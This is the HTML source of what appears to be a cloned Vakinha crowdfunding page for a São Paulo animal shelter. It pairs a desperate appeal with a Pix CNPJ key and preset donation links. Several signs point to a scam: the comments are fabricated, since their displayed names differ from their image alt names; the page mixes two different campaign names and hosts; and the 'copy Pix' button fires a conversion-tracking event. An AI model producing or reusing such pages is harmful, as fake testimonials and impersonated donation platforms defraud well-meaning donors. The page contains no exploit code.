<!DOCTYPE html><html lang="pt-BR"><head>
<meta name="csrf-token" content="6E9d6vFcrVmlgvAbEtC91C3kYRu7DgyzaedsgsaG">
<title> Ajuda Online</title>
<meta name="description" content="Nosso abrigo luta todos os dias para manter esses anjinhos seguros, alimentados e saudáveis. Mas sem apoio público, cada dia é uma batalha contra a fome, a falta de recursos e o medo de não conseguir continuar…">
<meta name="keywords" content="ajudar, ong, animais, abandonados, ong animal, projeto animal, doação, vaquinha online, animais de rua">
<meta name="author" content="Ajuda Online">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="theme-color" content="#FFFFFF">
<meta name="apple-mobile-web-app-status-bar-style" content="#FFFFFF">
<meta name="msapplication-navbutton-color" content="#FFFFFF">
<meta property="og:title" content=">Salve o Abrigo Patas Solidária : Um refúgio para animais abandonados!❤️ ">
<meta property="og:description" content="Nosso abrigo luta todos os dias para manter esses anjinhos seguros, alimentados e saudáveis. Mas sem apoio público, cada dia é uma batalha contra a fome, a falta de recursos e o medo de não conseguir continuar…">
<meta property="og:url" content="#">
<meta property="og:type" content="website">
<meta property="og:image" content="https://ajudeocantinho.site/public/images/img1.webp">
<link rel="shortcut icon" href="images/favicon.ico">
<link rel="shortcut icon" href="images/favicon.ico">
<link rel="icon" href="images/favicon.ico" sizes="32x32">
<link rel="icon" href="images/favicon.ico" sizes="192x192">
<link rel="preload" href="https://scripts.converteai.net/70f3685c-4a06-4f3f-ae4e-99106924ea06/players/67f924906060d1ce69c8b783/player.js" as="script">
<link rel="preload" href="https://scripts.converteai.net/lib/js/smartplayer/v1/smartpFlayer.min.js" as="script">
<link rel="preload" href="https://images.converteai.net/70f3685c-4a06-4f3f-ae4e-99106924ea06/players/67f924906060d1ce69c8b783/thumbnail.jpg" as="image">
<link rel="preload" href="https://cdn.converteai.net/70f3685c-4a06-4f3f-ae4e-99106924ea06/67f9245ca6ebef405bdb58d3/main.m3u8" as="fetch">
<link rel="dns-prefetch" href="https://cdn.converteai.net">
<link rel="dns-prefetch" href="https://scripts.converteai.net">
<link rel="dns-prefetch" href="https://images.converteai.net">
<link rel="dns-prefetch" href="https://api.vturb.com.br">
<link rel="apple-touch-icon" href="images/favicon.ico">
<meta name="msapplication-TileImage" content="https://ajudeocantinho.site/public/images/favicon.ico">
<link href="css/swiper-bundle.min.css" rel="stylesheet">
<link href="css/bootstrap.min.css" rel="stylesheet">
<link href="css/all.min.css" rel="stylesheet">
<link href="css/style.css" rel="stylesheet">
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
 
<script>
    window.googlePixelId = "68785d12eb0bfcd5b4c5391c";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel-google.js");
    document.head.appendChild(a);
  </script><script async="" defer="" src="js/pixel-google.js"></script>


<style>
    
    html, body {
  margin: 0;
  padding: 0;
  overflow-x: hidden; /* Impede scroll lateral */
  width: 100%;
}

* {
  box-sizing: border-box;
}
</style>
<script src="js/player.js" async=""></script></head>
<body>

<main id="content-page">
        <div class="sc-jXbUNg iuroKH"><div class="sc-jXbUNg drUFBp" cursor="pointer"><p>

Doe e receba recompensas incríveis toda semana ✅
    </p>
    </div></div>
<style>
  .iuroKH {
    background-color: rgb(169, 106, 227);
    display: flex;
    justify-content: center;
    align-items: center;
  }

  .iuroKH p {
    color: white; /* Cor branca no texto */
    font-weight: 500;
    font-family: sans-serif;
    font-size: 14px;
    margin: 12px 16px;
  }
</style>

        <header>
    <div class="container">
        <div class="content-header d-flex align-items-center justify-content-between">
            <div class="logo">
                <a href="#"><img src="images/logo.svg" alt="Vakinha Online"></a> 
            </div>
            <div class="menu-header d-none d-lg-flex d-xl-flex align-items-center">
                <div class="item-menu"><span>Como ajudar</span><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium sc-252fa7a3-14 ixtrj css-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="KeyboardArrowDownIcon" width="24" height="24"><path d="M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6z"></path></svg></div>
                <div class="item-menu"><span>Descubra</span><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium sc-252fa7a3-14 ixtrj css-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="KeyboardArrowDownIcon" width="24" height="24"><path d="M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6z"></path></svg></div>
                <div class="item-menu"><span>Como funciona</span><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium sc-252fa7a3-14 ixtrj css-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="KeyboardArrowDownIcon" width="24" height="24"><path d="M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6z"></path></svg></div>
                <div class="logArea d-flex align-items-center justify-content-end">
                    <div class="item-menu-busca">
                        <span>Buscar</span>
                        <svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium sc-252fa7a3-15 iZaOBt css-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="SearchRoundedIcon"><path d="M15.5 14h-.79l-.28-.27c1.2-1.4 1.82-3.31 1.48-5.34-.47-2.78-2.79-5-5.59-5.34-4.23-.52-7.79 3.04-7.27 7.27.34 2.8 2.56 5.12 5.34 5.59 2.03.34 3.94-.28 5.34-1.48l.27.28v.79l4.25 4.25c.41.41 1.08.41 1.49 0 .41-.41.41-1.08 0-1.49zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14"></path></svg>
                    </div>
                    <div class="item-menu-account"><span>Minha conta</span></div>
                    <div class="btn-create">
                                                    <button type="button" class="btn-create-button">Criar vaquinha</button>
                                            </div>
                </div>
            </div>
            <div class="menu-mobile d-flex d-lg-none d-xl-none align-items-center">
                <div class="busca-mobile"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium css-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="SearchIcon"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14"></path></svg></div>
                <button class="menu-mobile">
                    <svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium sc-c5ec013-3 bQLvwO bm-icon css-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="NotesIcon" style="width: 100%; height: 100%;"><path d="M3 18h12v-2H3zM3 6v2h18V6zm0 7h18v-2H3z"></path></svg>
                </button>
            </div>
        </div>
    </div>
</header>        <section id="corpo">
    <div class="container">
  
            <span>Animais / Pets</span>
            <h1>🐶 São mais de 120 Animais que contam com você neste momento difícil💔️</h1>
            <span>ID: 4507141</span>
        </div>
        <div class="detailsVakinha d-flex flex-wrap">
            <div class="detalhes">
                <div class="detalhes-view">
                    <div class="galeria">
                        <div role="button" tabindex="0" class="sc-873b4941-20 cbskvx"><svg id="heartCoreOff" xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40"><defs><clipPath id="clipPath"><rect id="Retângulo_417" data-name="Retângulo 417" width="4.22" height="2.645" fill="#fff"></rect></clipPath><clipPath id="clipPath-2"><path id="Caminho_602" data-name="Caminho 602" d="M13.572,1.465A4.226,4.226,0,0,0,10.79,3.414c-.149.244-.184.486-.1.583s.268.052.543-.092c.4-.212,1.029-.59,1.611-.883a7.235,7.235,0,0,1,1.213-.494c1.122-.3,1.181-1.4-.483-1.064" transform="translate(-10.645 -1.403)" fill="#fff" clip-rule="evenodd"></path></clipPath><clipPath id="clipPath-3"><rect id="Retângulo_419" data-name="Retângulo 419" width="4.979" height="5.058" fill="#fff"></rect></clipPath><clipPath id="clipPath-4"><path id="Caminho_603" data-name="Caminho 603" d="M3.914,1.343A3.517,3.517,0,0,0,1.3,3.488a.633.633,0,0,0,.023.643c.109.1.307.058.576-.1.393-.232,1-.649,1.57-.971a6.357,6.357,0,0,1,1.222-.542c1.165-.334.979-1.539-.775-1.172M.463,5.31c-.084.479.175,1.437.605.826a3.432,3.432,0,0,0,.387-.764.685.685,0,0,0-.2-.743c-.5-.32-.736.348-.8.682" transform="translate(-0.447 -1.275)" fill="#fff" clip-rule="evenodd"></path></clipPath></defs><g id="Grupo_1366" data-name="Grupo 1366" transform="translate(-5986 577)"><circle id="Elipse_6" data-name="Elipse 6" cx="20" cy="20" r="20" transform="translate(5986 -577)" fill="#fff"></circle><g id="Grupo_1239" data-name="Grupo 1239" transform="translate(5726 -795.569)"><path id="Caminho_597" data-name="Caminho 597" d="M10.789,2.572A6.652,6.652,0,0,0,3.739.285C.819,1.21-.387,4.422.109,7.262c.785,4.507,5.706,9,9.964,10.666a1.976,1.976,0,0,0,.7.142h.037a1.923,1.923,0,0,0,.695-.142c4.3-1.7,9.179-6.159,9.965-10.666a7.373,7.373,0,0,0,.108-1.192V5.946A5.729,5.729,0,0,0,17.839.285,6.029,6.029,0,0,0,16.014,0a6.9,6.9,0,0,0-5.225,2.572" transform="translate(269 229.569)" fill="#dadada"></path><g id="Grupo_930" data-name="Grupo 930" transform="translate(280.65 230.869)" opacity="0.28" style="isolation: isolate;"><g id="Grupo_915" data-name="Grupo 915"><g id="Grupo_914" data-name="Grupo 914" clip-path="url(#clipPath)"><g id="Grupo_913" data-name="Grupo 913" transform="translate(0 0)"><g id="Grupo_912" data-name="Grupo 912" clip-path="url(#clipPath-2)"><rect id="Retângulo_416" data-name="Retângulo 416" width="4.63" height="2.959" transform="translate(-0.039 -0.271)" fill="#fff"></rect></g></g></g></g></g><g id="Grupo_920" data-name="Grupo 920" transform="translate(269.688 230.869)" opacity="0.28" style="isolation: isolate;"><g id="Grupo_919" data-name="Grupo 919" clip-path="url(#clipPath-3)"><g id="Grupo_918" data-name="Grupo 918" transform="translate(0 0)"><g id="Grupo_917" data-name="Grupo 917" clip-path="url(#clipPath-4)"><rect id="Retângulo_418" data-name="Retângulo 418" width="5.476" height="5.771" transform="translate(-0.069 -0.298)" fill="#fff"></rect></g></g></g></g><path id="Caminho_608" data-name="Caminho 608" d="M11.582,1.721c2.507-1.872,5.746-.54,7.208,1.592a7.171,7.171,0,0,1,.74,6.2c-1.082,3.521-5.828,6.991-8.757,7.165-2.243.133-4.808-1.357-7.284-3.307a18.917,18.917,0,0,0,6.565,4.559,1.881,1.881,0,0,0,1.433,0c4.3-1.7,9.179-6.158,9.965-10.666.495-2.84-.711-6.052-3.631-6.977a6.526,6.526,0,0,0-6.238,1.437" transform="translate(269.019 229.569)" fill="#dadada" fill-rule="evenodd" opacity="0.1" style="mix-blend-mode: multiply; isolation: isolate;"></path></g></g></svg></div>
                        <div class="swiper-wrapper">
                            
<vturb-smartplayer id="vid-689d263c4c4ae214c839d79d" style="display: block; margin: 0 auto; width: 100%; "></vturb-smartplayer> <script type="text/javascript"> var s=document.createElement("script"); s.src="https://scripts.converteai.net/55d53fe8-c70d-4a70-8501-134e12005d5f/players/689d263c4c4ae214c839d79d/v4/player.js", s.async=!0,document.head.appendChild(s); </script>

                                                    </div>
                        <div class="galeria-pagination"></div>
                    </div>
                    <div class="sc-jXbUNg jeWFMw">
                        <ul class="sc-46fe23d1-0 haSOVG">
                            <li class="sc-46fe23d1-1 gNSeDc"><img class="sc-ad44238c-0 bFFsjk sc-46fe23d1-2 lgcmt" src="images/avs.svg"></li>
                            <li class="sc-46fe23d1-1 gNSeDc"><img class="sc-ad44238c-0 bFFsjk sc-46fe23d1-2 lgcmt" src="images/api.png"></li>
                            <li class="sc-46fe23d1-1 gNSeDc"><img class="sc-ad44238c-0 bFFsjk sc-46fe23d1-2 lgcmt" src="images/imm.svg"></li>
                            <li class="sc-46fe23d1-1 gNSeDc"><img class="sc-ad44238c-0 bFFsjk sc-46fe23d1-2 lgcmt" src="images/lo.webp"></li>
                            <li class="sc-46fe23d1-1 gNSeDc"><img class="sc-ad44238c-0 bFFsjk sc-46fe23d1-2 lgcmt" src="images/kc.webp"></li>
                            <li class="sc-46fe23d1-1 gNSeDc"><section class="sc-46fe23d1-3 jLFjnt">+</section></li>
                        </ul>
                        <div class="sc-jXbUNg kaMzRM">
                            <span class="sc-fqkvVR ivmFdA"><span id="coracoes">154</span> corações recebidos</span>
                            <div class="sc-jXbUNg iVMVsL">
                                <svg id="___SVG_ID__1__31___" data-name="Grupo 1248" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 18.319 15.34"><defs><radialGradient id="___SVG_ID__1__0___" cx="0.298" cy="0.5" r="1.023" gradientTransform="matrix(0.853, 0, 0, -1, 0.003, 2)" gradientUnits="objectBoundingBox"><stop offset="0" stop-color="#24ca68"></stop><stop offset="0.704" stop-color="#0a8f51"></stop><stop offset="1" stop-color="#007a48"></stop></radialGradient><clipPath id="___SVG_ID__1__2___"><rect id="___SVG_ID__1__1___" data-name="Retângulo 417" width="3.582" height="2.246" fill="#fff"></rect></clipPath><clipPath id="___SVG_ID__1__4___"><path id="___SVG_ID__1__3___" data-name="Caminho 602" d="M13.13,1.456A3.588,3.588,0,0,0,10.768,3.11c-.126.207-.156.412-.086.5s.228.044.461-.078c.341-.18.873-.5,1.368-.75a6.142,6.142,0,0,1,1.03-.419c.953-.257,1-1.187-.41-.9" transform="translate(-10.645 -1.403)" fill="#fff" clip-rule="evenodd"></path></clipPath><clipPath id="___SVG_ID__1__6___"><rect id="___SVG_ID__1__5___" data-name="Retângulo 419" width="4.227" height="4.294" fill="#fff"></rect></clipPath><clipPath id="___SVG_ID__1__8___"><path id="___SVG_ID__1__7___" data-name="Caminho 603" d="M3.39,1.333A2.985,2.985,0,0,0,1.17,3.154a.537.537,0,0,0,.02.545c.092.088.26.05.489-.086.334-.2.847-.551,1.333-.825a5.4,5.4,0,0,1,1.037-.46c.989-.283.831-1.307-.658-1M.461,4.7c-.072.406.149,1.22.514.7A2.914,2.914,0,0,0,1.3,4.753a.582.582,0,0,0-.167-.631c-.421-.271-.625.3-.675.579" transform="translate(-0.447 -1.275)" fill="#fff" clip-rule="evenodd"></path></clipPath><clipPath id="___SVG_ID__1__10___"><rect id="___SVG_ID__1__9___" data-name="Retângulo 415" width="8.687" height="4.274"></rect></clipPath><clipPath id="___SVG_ID__1__12___"><path id="___SVG_ID__1__11___" data-name="Caminho 601" d="M7.878,4.086a16.6,16.6,0,0,1,1.362-1.9A5.646,5.646,0,0,0,3.255.242a4.376,4.376,0,0,0-2.7,2.514C2.37-.562,7.8.568,7.635,3.414a3.858,3.858,0,0,1-.05.519c-.038.194-.045.3.027.334s.178-.03.265-.18" transform="translate(-0.553 0)" clip-rule="evenodd"></path></clipPath></defs><path id="___SVG_ID__1__13___" data-name="Caminho 597" d="M9.16,2.184A5.647,5.647,0,0,0,3.174.242C.695,1.027-.329,3.754.092,6.165c.667,3.826,4.845,7.644,8.459,9.055a1.678,1.678,0,0,0,.6.12h.032a1.633,1.633,0,0,0,.59-.12c3.649-1.445,7.792-5.229,8.46-9.055a6.259,6.259,0,0,0,.091-1.012V5.048A4.864,4.864,0,0,0,15.145.242,5.119,5.119,0,0,0,13.6,0,5.855,5.855,0,0,0,9.16,2.184" transform="translate(0 0)" fill="url(#___SVG_ID__1__0___)"></path><g id="___SVG_ID__1__19___" data-name="Grupo 930" transform="translate(9.891 1.103)" opacity="0.28" style="isolation: isolate;"><g id="___SVG_ID__1__18___" data-name="Grupo 915"><g id="___SVG_ID__1__17___" data-name="Grupo 914" clip-path="url(#___SVG_ID__1__2___)"><g id="___SVG_ID__1__16___" data-name="Grupo 913" transform="translate(0 0)"><g id="___SVG_ID__1__15___" data-name="Grupo 912" clip-path="url(#___SVG_ID__1__4___)"><rect id="___SVG_ID__1__14___" data-name="Retângulo 416" width="3.93" height="2.512" transform="translate(-0.033 -0.23)" fill="#fff"></rect></g></g></g></g></g><g id="___SVG_ID__1__24___" data-name="Grupo 920" transform="translate(0.584 1.103)" opacity="0.28" style="isolation: isolate;"><g id="___SVG_ID__1__23___" data-name="Grupo 919" clip-path="url(#___SVG_ID__1__6___)"><g id="___SVG_ID__1__22___" data-name="Grupo 918" transform="translate(0 0)"><g id="___SVG_ID__1__21___" data-name="Grupo 917" clip-path="url(#___SVG_ID__1__8___)"><rect id="___SVG_ID__1__20___" data-name="Retângulo 418" width="4.649" height="4.899" transform="translate(-0.058 -0.253)" fill="#fff"></rect></g></g></g></g><path id="___SVG_ID__1__25___" data-name="Caminho 608" d="M10.359,1.461C12.487-.128,15.237,1,16.478,2.813a6.087,6.087,0,0,1,.628,5.262c-.919,2.99-4.948,5.935-7.435,6.082-1.9.113-4.081-1.152-6.184-2.808A16.06,16.06,0,0,0,9.062,15.22a1.6,1.6,0,0,0,1.216,0c3.649-1.445,7.792-5.228,8.46-9.055.42-2.411-.6-5.138-3.083-5.924a5.54,5.54,0,0,0-5.3,1.22" transform="translate(-0.511 0)" fill-rule="evenodd" opacity="0.1" style="mix-blend-mode: multiply; isolation: isolate;"></path><g id="___SVG_ID__1__30___" data-name="Grupo 910" transform="translate(0.467 0)" opacity="0.1" style="mix-blend-mode: multiply; isolation: isolate;"><g id="___SVG_ID__1__29___" data-name="Grupo 909" clip-path="url(#___SVG_ID__1__10___)"><g id="___SVG_ID__1__28___" data-name="Grupo 908" transform="translate(0 0)"><g id="___SVG_ID__1__27___" data-name="Grupo 907" clip-path="url(#___SVG_ID__1__12___)"><rect id="___SVG_ID__1__26___" data-name="Retângulo 414" width="8.688" height="4.87" transform="translate(0 -0.574)"></rect></g></g></g></g></svg>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="resumo-mobile sticker d-block d-lg-none d-xl-none">
                    <div class="perfil d-flex">
                        <div class="avatar">
                            <img src="images/3newlogo.png" alt="Abrigo Patas Solidarias">
                        </div>
                        <div class="dadosPerfil">
                            <h3>Abrigo Patas Solidarias</h3>
                            <span class="cidade">São Paulo - SP</span>
                            <span class="ativo">Ativo(a) no Vakinha desde 09/02/2025</span>
                            <span class="vakinhas">12 vaquinha criada <div class="bullet"></div> 1 vaquinha apoiada</span>
                            <a href="#">Leia mais</a>
                        </div>
                    </div>
                    <div class="progresso-mobile d-flex align-items-center">
                        <div class="porcentagem"><span id="porcentagem">10%</span></div>
                        <div class="barra">
                            <div class="barraParcial" id="barraMobile"></div>
                        </div>
                    </div>
                    <div class="arrecadacaoMobile">
                        <strong id="valorMobile">R$ 5.960,00</strong> de <span>R$ 12.000,00</span>
                    </div>
                </div>
                  
                <div class="menu-detalhes">
                    <ul>
                        <li class="active">Sobre</li>
                        <li>Novidades</li>
                        <li>Quem ajudou</li>
                    </ul>
                </div>
                <div class="show-sobre">
                    <span class="inicio"><strong>Vaquinha criada em:</strong> 20/06/2025</span>
                 <p><b>💔 Sem a sua ajuda, eles tem poucos dias…</b></p>
                    <p> Eu quem cuido desses mais de 120 Animais. Cada um deles tem uma história de abandono, dor, fome. E agora eu estou vendo eles sofrerem tudo de novo, mesmo dentro do abrigo!</p>
                                        <p>Estamos há <b>12 dias SEM ENERGIA</b>. O aluguel já tem <b>UM MES atrasado</b>, as dívidas no veterinário só crescem e a ração acabou... Eu tento improvisar comida, mas muitos estão tão fraquinhos que mal conseguem levantar!</p>
                                                            <p>Eu estou lutando, mas <b>não consigo mais sozinha</b>. Preciso levantar <b>R$12 mil</b> para pagar luz, aluguel, dívidas e comprar pelo menos <b>20 kg de ração</b> para os mais necessitados.</p>
                                                                                <p>Por favor, eu te imploro do fundo do coração: <b>ME AJUDA A SALVAR ELES!</b> Cada doação é um prato cheio, um tratamento, uma esperança. 🙏 </p>
                                                                                                    <p>Doe agora. Eles só têm a mim. E eu, agora, só tenho vocês. 🐾💖</p>
                                                                                                    
                                                                                                    

   <img class="imagem-legenda" src="images/1newfoto.png" alt="Imagem 1">


      
      <style>
      .perfil .dadosPerfil span.cidade {
    font-size: 12px;
    display: block;
    color: rgb(40, 40, 40);
    font-weight: 400;
    text-align: left;
    line-height: 16px;
}
      .perfil .dadosPerfil span.ativo {
    font-size: 12px;
    display: block;
    color: rgb(64, 64, 64);
    font-weight: 700;
    line-height: 16px;
    text-align: left;
}
      .show-sobre p{
color: rgb(40, 40, 40);
font-size: 16px;
line-height: 22px;
font-weight: 400;
text-align: center;
}


    .imagem-legenda {
      max-width: 300px;
      text-align: center;
    margin-left: 16px;
    }

    .imagem-legenda img {
width: 70%;
    /* height: auto; */
    border-radius: 6px;
    /* display: block; */
    margin-top: -47px;
    }

    .legenda {
margin-top: 13px;
    font-size: 14px;
    color: #333;
    margin-bottom: 20px;
    }

    @media (max-width: 600px) {
      .imagem-legenda {
max-width: 90%;
      }

      .legenda {
        font-size: 13px;
      }
    }
  </style>



                </div>


 <div class="container">
       <p><b>Chave Pix para o valor que o seu coração mandar!❤️</b></p>
       <p><b>Chave CNPJ:</b></p>
         <input type="text" id="texto" readonly="" value="61.841.519/0001-97">
        <button onclick="copiarTexto()">Copiar Chave Pix</button><br>
       <p><b>Recebedor: Abrigo Patas Solidarias<br></b></p>
        <div class="notification" id="notification">Copiado com sucesso!</div>
        
        <script>
            function copiarTexto() {
                var texto = document.getElementById("texto");
                texto.select();
                texto.setSelectionRange(0, 99999);
                navigator.clipboard.writeText(texto.value);
        
                var notification = document.getElementById("notification");
                notification.style.display = "block";
        
                setTimeout(function() {
                    notification.style.display = "none";
                }, 2000);
        
                // Disparar evento no Meta Pixel (Facebook)
                if (typeof fbq === "function") {
                    fbq("track", "CopyPix");
                }
            }
        </script>

    
    <style>
                .container {
            text-align: center;
            background: white;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);
        }

        input {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            border: 2px solid #24ca68;
            border-radius: 5px;
            text-align: center;
            font-weight: bold;
            color: #2c3e50;
            background-color: #ecf0f1;
        }

        button {
            margin-top: 15px;
            padding: 10px 20px;
            font-size: 16px;
            font-weight: bold;
            color: white;
            background: #24ca68;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: 0.3s;
        }

        button:hover {
            background: #24ca68;
        }

    .notification {
        display: none;
        position: fixed;
        top: 20px; /* Posição no topo */
        left: 50%;
        transform: translateX(-50%);
        background: #2ecc71;
        color: white;
        padding: 10px 20px;
        border-radius: 5px;
        box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);
        z-index: 9999; /* Garante que a notificação fique acima de outros elementos */
    }
    </style>


                <div class="plugin-facebook">
<div class="box-comentarios-face facebook-comments">
    <div class="content-box">
        <h4>Mostrando 6 Comentários</h4>
        <div class="comentario">
            <div class="content-comentario">
                <div class="avatar">
                    <img src="images/111.jpg" alt="Ana Clara">
                </div>
                <div class="text-comentario">
                    <h3>Julia Silva</h3>
                    <p>Fiz minha parte, é doloroso ver a situação desses animais nas ruas.</p>
                    <div class="d-flex align-items-center"><span>Responder</span><span>Curtir</span><span>Seguir</span><span>3 min</span></div>
                </div>
            </div>
        </div>
        <div class="comentario">
            <div class="content-comentario">
                <div class="avatar">
                    <img src="images/pedro_henrique.webp" alt="Pedro Henrique">
                </div>
                <div class="text-comentario">
                    <h3>Rafael Gomes</h3>
                    <p>Eu realmente quis ajudar, é uma situação muito difícil...</p>
                    <div class="d-flex align-items-center"><span>Responder</span><span>Curtir</span><span>Seguir</span><span>5 min</span></div>
                </div>
            </div>
        </div>
        <div class="comentario">
            <div class="content-comentario">
                <div class="avatar">
                    <img src="images/222.jpg" alt="Cicera Rodrigues">
                </div>
                <div class="text-comentario">
                    <h3>Luciana Pereira</h3>
                    <p>Fiz uma oração com muito amor. Que Deus abençoe todos vocês.</p>
                    <div class="d-flex align-items-center"><span>Responder</span><span>Curtir</span><span>Seguir</span><span>9 min</span></div>
                </div>
            </div>
        </div>
        <div class="comentario">
            <div class="content-comentario">
                <div class="avatar">
                    <img src="images/333.jpg" alt="Meire Fonseca">
                </div>
                <div class="text-comentario">
                    <h3>Mariana Santos</h3>
                    <p>Estou muito triste com tudo isso!</p>
                    <div class="d-flex align-items-center"><span>Responder</span><span>Curtir</span><span>Seguir</span><span>14 min</span></div>
                </div>
            </div>
            <div class="respostas-comentarios"> 
                <div class="comentario">
                    <div class="content-comentario">
                        <div class="avatar">
                            <img src="images/444.jpg" alt="Gabriela Oliveira">
                        </div>
                        <div class="text-comentario">
                            <h3>Fernanda Lima</h3>
                            <p>Aqui ajudei com 70 reais, gostaria de poder dar mais.</p>
                            <div class="d-flex align-items-center"><span>Responder</span><span>Curtir</span><span>Seguir</span><span>6 min</span></div>
                        </div>
                    </div>
                </div>
                <div class="comentario">
                    <div class="content-comentario">
                        <div class="avatar">
                            <img src="images/555.jpg" alt="Letícia Mara">
                        </div>
                        <div class="text-comentario">
                            <h3>Patrícia Alves</h3>
                            <p>Acredito que se todos ajudarem um pouco, faremos uma grande diferença.</p>
                            <div class="d-flex align-items-center"><span>Responder</span><span>Curtir</span><span>Seguir</span><span>1 min</span></div>
                        </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <p class="final">Você precisa estar logado para comentar.</p>
                    </div>
                </div>
            </div>
    
    <style>
                .container {
            text-align: center;
            background: white;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);
        }

        input {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            border: 2px solid #24ca68;
            border-radius: 5px;
            text-align: center;
            font-weight: bold;
            color: #2c3e50;
            background-color: #ecf0f1;
        }

        button {
            margin-top: 15px;
            padding: 10px 20px;
            font-size: 16px;
            font-weight: bold;
            color: white;
            background: #24ca68;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: 0.3s;
        }

        button:hover {
            background: #24ca68;
        }

    .notification {
        display: none;
        position: fixed;
        top: 20px; /* Posição no topo */
        left: 50%;
        transform: translateX(-50%);
        background: #2ecc71;
        color: white;
        padding: 10px 20px;
        border-radius: 5px;
        box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);
        z-index: 9999; /* Garante que a notificação fique acima de outros elementos */
    }
    .p-patas {
    font-size: 17px; /* Exemplo de tamanho */
    color: #333; /* Cor do texto */
    font-weight: bold; /* Deixe o texto em negrito */
    text-align: center; /* Alinha o texto ao centro */
}
    </style>


            <div class="resumo">
                <div class="sticker-resumo">
                    <div class="progresso">
                        <div class="barra-geral">
                            <div class="barraTotal">
                                <div class="barraParcial" id="barra"></div>
                            </div>
                        </div>
                    </div>
                    <div class="arrecadado">
                        <span>Arrecadado</span>
                        <h2 id="doado">R$ 5.960,00</h2>
                    </div>
                    <div class="meta">
                        <span>Meta</span>
                        <span>R$ 12.000,00</span>
                    </div>
                    <div class="apoiadores">
                        <span>Apoiadores</span>
                        <span id="apoiadores">82</span>
                    </div>

                    <div class="perfil d-flex">
                        <div class="avatar">
                            <img src="images/3newlogo.png" alt="Abrigo Patas Solidarias">
                        </div>
                        <div class="dadosPerfil">
                            <h3>Abrigo Patas Solidarias</h3>
                            <span class="cidade">São Paulo - SP</span>
                            <span class="ativo">Ativo(a) no Vakinha desde 09/02/2025</span>
                            <span class="vakinhas">12 vaquinhas criadas <div class="bullet"></div> 1 vaquinha apoiada</span>
                            <a href="#">Leia mais</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<section id="fixed-mobile" class="d-block d-lg-none d-xl-none">
   <button type="button" class="btn-ajudar">Doar Agora!</button>
</section>


<div class="modal modal-doar">
    <div class="fora-modal"></div>
    <div class="content-modal">
        <div class="close-modal"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" width="14" height="14" x="0" y="0" viewBox="0 0 320.591 320.591" style="enable-background:new 0 0 512 512" xml:space="preserve" class=""><g><path d="M30.391 318.583a30.37 30.37 0 0 1-21.56-7.288c-11.774-11.844-11.774-30.973 0-42.817L266.643 10.665c12.246-11.459 31.462-10.822 42.921 1.424 10.362 11.074 10.966 28.095 1.414 39.875L51.647 311.295a30.366 30.366 0 0 1-21.256 7.288z" fill="#ffffff" opacity="1" data-original="#000000" class=""></path><path d="M287.9 318.583a30.37 30.37 0 0 1-21.257-8.806L8.83 51.963C-2.078 39.225-.595 20.055 12.143 9.146c11.369-9.736 28.136-9.736 39.504 0l259.331 257.813c12.243 11.462 12.876 30.679 1.414 42.922-.456.487-.927.958-1.414 1.414a30.368 30.368 0 0 1-23.078 7.288z" fill="#ffffff" opacity="1" data-original="#000000" class=""></path></g></svg></div>
        <h2>Qual valor deseja doar?</h2>
        <div class="valores d-flex align-items-center justify-content-between flex-wrap">
            <a href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=30">R$ 30,00</a>
            <a href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=50">R$ 50,00</a>
            <a href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=75">R$ 75,00</a>
            <a href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=100">R$ 100,00</a>
            <a href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=150">R$ 150,00</a>
            <a href="salve-o-cantinho-do-amor-pet-um-refugio-para-animais-abandonados/contribuir.html?donate=200">R$ 200,00</a>
